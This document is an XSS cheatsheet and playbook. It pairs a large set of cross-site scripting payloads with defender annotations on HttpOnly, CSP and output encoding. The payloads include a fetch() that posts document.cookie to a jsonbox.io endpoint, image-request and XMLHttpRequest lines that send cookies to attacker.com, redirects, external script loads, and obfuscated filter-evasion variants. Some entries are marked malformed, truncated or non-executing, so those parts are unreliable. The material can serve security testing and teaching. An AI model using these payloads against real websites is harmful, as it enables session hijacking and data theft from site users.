XSS Cheatsheet
javascript
// Running this code when an XSS attack is feasible will send the cookie to an API
<script>
// Defender notes: document.cookie exposes only cookies that lack the HttpOnly flag,
// so an HttpOnly session cookie never reaches this request. The call is a cross-origin
// POST with a JSON Content-Type, so it is subject to a CORS preflight and is blocked by
// a Content-Security-Policy connect-src that does not list the destination origin.
fetch('https://jsonbox.io/box_fd90d69348aabf9a9383', {
headers: { "Content-Type": "application/json; charset=utf-8" },
method: 'POST',
body: JSON.stringify({ cookie: document.cookie })
})
// The response is only echoed to the console; nothing else on this page consumes it.
.then(response => response.json())
.then(data => console.log(data))
</script>
html
<!-- Reference list of inline-script and event-handler payloads. Each one depends on
     untrusted text reaching an HTML sink without output encoding; encoding at the sink
     removes the whole class. A Content-Security-Policy script-src without
     'unsafe-inline' blocks every inline <script> and on* handler below; the eval()
     variants additionally need 'unsafe-eval', and the external-script and import()
     variants need the remote origin to be allowed by script-src. -->
<!-- Basic payload -->
<script>alert('XSS')</script>
<!-- Image tag payload -->
<img src=x onerror=alert('XSS')>
<!-- If you control the URL -->
<svg onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval is not enabled -->
<svg onload=location=name>
<!-- Nested SVG payload -->
<svg><svg onload=alert('XSS')></svg>
<!-- Audio tag payload with window name control -->
<audio src=x onerror=eval(name)>
<!-- Image tag payload with URL control -->
<img src=x onerror=eval(`'`+URL)>
<!-- External script payload (protocol-relative URL, so it follows the page's scheme) -->
<script src=//example.com></script>
<!-- Iframe payload with window name control -->
<iframe onload=src=top.name></iframe>
<!-- Iframe payload with URL control -->
<iframe onload=eval(`'`+URL)></iframe>
<!-- Iframe payload with random number of iframes -->
<iframe onload=src=contentWindow.name+/\NJ.₨?/></iframe>
<!-- Iframe payload with external script for Firefox -->
<!-- Note: as written the srcdoc attribute value is never closed, so this line is
     malformed HTML; it is kept exactly as found. -->
<iframe srcdoc="<svg><script/href=//example.com /></iframe>
<!-- Iframe payload with external script and disabled inline styles -->
<iframe srcdoc="<script/src=//example.com></script>"></iframe>
<!-- Inline style payload with allowed inline styles -->
<style onload=eval(name)></style>
<!-- Inline style payload with URL control -->
<style onload=eval(`'`+URL)></style>
<!-- Inline style payload with blocked inline styles -->
<style onerror=eval(name)></style>
<!-- Importing external script with SVG (dynamic import() is governed by script-src) -->
<svg onload=import(/\\example.com/)></svg>
<!-- Importing external script with style -->
<style onload=import(/\\example.com/)></style>
<!-- Importing external script with iframe -->
<iframe onload=import(/\\example.com/)></iframe>
---OBFUSCATED---
<!-- Obfuscation changes the surface form of a payload, not the sink it needs.
     Filters that pattern-match strings such as alert( or <script> are what these
     variants are written to get past; output encoding at the sink and a CSP without
     'unsafe-inline' are unaffected by any of them, so detection should key on the
     injection point rather than on payload strings. -->
<!-- Polyglot: HTML/JavaScript/CSS -->
<script>/*<svg/*/alert`XSS`//</script>
<!-- Polyglot: HTML/JavaScript/URL -->
';alert('XSS');//';alert('XSS');//-->
<!-- Obfuscated payload using Base64 encoding (the literal decodes to alert("XSS")) -->
<script>eval(atob('YWxlcnQoIlhTUyIp'));</script>
<!-- Obfuscated payload using String.fromCharCode() (the code points spell alert('XSS')) -->
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41))</script>
<!-- Obfuscated payload using JSFuck -->
<!-- Note: this example is truncated. The six bracket expressions evaluate to the
     characters f, a, t, r, u, e, so eval() receives the identifier "fatrue" and throws
     a ReferenceError instead of calling alert(). -->
<script>eval((![]+[])[+[]]+(![]+[])[+!+[]]+(!![]+[][[]])[+[]]+(!![]+[][[]])[+!+[]]+(!![]+[][[]])[+!+[]+!+[]]+(!![]+[][[]])[+!+[]+!+[]+!+[]])</script>
<!-- Obfuscated payload using HTML entities -->
<!-- Note: the entity-encoded form did not survive rendering; the line below is the
     plain payload. -->
<script>alert('XSS');</script>
<!-- Obfuscated payload using backticks instead of quotes -->
<script>alert(`XSS`)</script>
<!-- Obfuscated payload using a custom function and setTimeout() -->
<script>
function xss() {
alert('XSS');
}
setTimeout(xss, 0);
</script>
<!-- Obfuscated payload using a self-invoking anonymous function -->
<script>
(function() {
alert('XSS');
})();
</script>
<!-- Obfuscated payload using JavaScript comments and line breaks -->
<script>//<!--
alert(/*
*/'XSS'/*
*/);//--></script>
XSS Playbook
XSS Test Commands
Reflected XSS:
#Test if a URL parameter is vulnerable to XSS by appending a simple script tag to the parameter:
https://example.com/search?query=<script>alert(‘XSS’)</script>
#Use the <img> tag to execute a script in the victim’s browser (note: current browsers do not run javascript: URLs in an img src, so this variant only shows whether the tag is reflected unescaped):
https://example.com/search?query=<img src=“javascript:alert(‘XSS’)”>
#Try to execute a script using the onerror attribute of an image tag:
https://example.com/search?query=<img src=x onerror=alert(‘XSS’)>
#Read the document.cookie property to display the victim’s cookies (cookies set with the HttpOnly flag are not readable from script and will not appear):
https://example.com/search?query=<script>alert(document.cookie)</script>
#Assign the document.location property to redirect the victim’s browser to a different page:
https://example.com/search?query=<script>document.location=‘https://attacker.com’</script>
#Send the victim’s data to a server controlled by the attacker through an image request (this variant uses new Image().src, not XMLHttpRequest):
https://example.com/search?query=<script>new Image().src=“https://attacker.com/?data=“+document.cookie;</script>
#Use the localStorage API to store data in the victim’s browser:
https://example.com/search?query=<script>localStorage.setItem(‘username’, ‘attacker’)</script>
#Call window.open to open a new window in the victim’s browser:
https://example.com/search?query=<script>window.open(‘https://attacker.com’)</script>
#Try to execute a script using the onload attribute of an image tag (note: onload fires only after a successful load, so with src=x this handler never runs):
https://example.com/search?query=<img src=x onload=alert(‘XSS’)>
#Use the document.write method to insert content into the page:
https://example.com/search?query=<script>document.write(‘Hello, world!’)</script>
Stored XSS:
#Inject a simple script tag into a comment or message field:
<script>alert(‘XSS’)</script>
#Use the <img> tag to execute a script when the page is loaded (note: current browsers do not run javascript: URLs in an img src):
<img src=“javascript:alert(‘XSS’)”>
#Inject a script using the onerror attribute of an image tag:
<img src=x onerror=alert(‘XSS’)>
#Read the document.cookie property and send the victim’s cookies to an attacker-controlled server (cookies set with the HttpOnly flag are not readable from script):
<script>new Image().src=“https://attacker.com/?data=“+document.cookie;</script>
#Use XMLHttpRequest to send the victim’s data to a server controlled by the attacker:
<script>var xhr=new XMLHttpRequest();xhr.open(‘GET’, ‘https://attacker.com/?data=‘+document.cookie, true);xhr.send();</script>
#Use the localStorage API to store data in the victim’s browser:
<script>localStorage.setItem(‘username’, ‘attacker’)</script>
#Call window.open to open a new window in the victim’s browser:
<script>window.open(‘https://attacker.com’)</script>
#Inject a script using the onload attribute of an image tag (note: onload fires only after a successful load, so with src=x this handler never runs):
<img src=x onload=alert(‘XSS’)>
#Use the document.write method to insert content into the page:
<script>document.write(‘Hello, world!’)</script>
#Call prompt() to display a dialog in the victim’s browser:
<script>prompt(‘Enter your password:’)</script>
DOM-based XSS:
#Use the location.hash property to execute a script when a specific URL is accessed (the fragment is never sent to the server; this only fires if client-side code writes location.hash into an HTML sink such as innerHTML):
https://example.com/#<script>alert(‘XSS’)</script>
#Inject markup using the innerHTML property of an element (note: <script> elements inserted via innerHTML are not executed by HTML5 parsers, so this payload does not fire as written):
<div id=“test”></div><script>document.getElementById(‘test’).innerHTML=‘<script>alert(\’XSS\’)<\/script>’;</script>
#Use the textContent property to inject text (note: textContent assigns literal text and never parses it as HTML, so the markup is rendered as visible text — this is a safe sink, shown here for contrast):
<div id=“test”></div><script>document.getElementById(‘test’).textContent=‘<script>alert(\’XSS\’)<\/script>’;</script>
#Inject a string using the setAttribute method (note: setting a data attribute on a div stores the string without parsing it, so nothing executes as written):
<div id=“test”></div><script>document.getElementById(‘test’).setAttribute(‘data’, ‘<script>alert(\’XSS\’)<\/script>’);</script>
#Use the createTextNode method to inject text (note: text nodes are never parsed as HTML, so the markup is rendered as literal text — this is a safe sink, shown here for contrast):
<div id=“test”></div><script>var node = document.createTextNode(‘<script>alert(\’XSS\’)<\/script>’);document.getElementById(‘test’).appendChild(node);</script>
#Use the onload attribute of an image tag to execute a script (note: current browsers do not run javascript: URLs in an img src, and onload would only fire after a successful load, so this does not execute as written):
<img src=“javascript:alert(‘XSS’)” onload=“this.removeAttribute(‘onload’)”/>
#Inject markup using the insertAdjacentHTML method (note: like innerHTML, <script> elements inserted this way are not executed):
<div id=“test”></div><script>document.getElementById(‘test’).insertAdjacentHTML(‘beforeend’, ‘<script>alert(\’XSS\’)<\/script>’);</script>
#Use the outerHTML property to replace an element with a script (note: like innerHTML, a <script> inserted this way is not executed):
<div id=“test”></div><script>document.getElementById(‘test’).outerHTML=‘<script>alert(\’XSS\’)<\/script>’;</script>
#Inject a script by creating a script element with createElement and attaching it with insertBefore (unlike the innerHTML variants, a script element inserted through the DOM API does execute):
<div id=“test”></div><script>var node = document.createElement(‘script’);node.text = “alert(‘XSS’)”;document.body.insertBefore(node, document.body.firstChild);</script>
#Use the innerHTML property to inject an element wrapping a script (note: the nested <script> is still not executed when inserted via innerHTML):
<div id=“test”></div><script>document.getElementById(‘test’).innerHTML=‘<div><script>alert(\’XSS\’)<\/script></div>’;</script>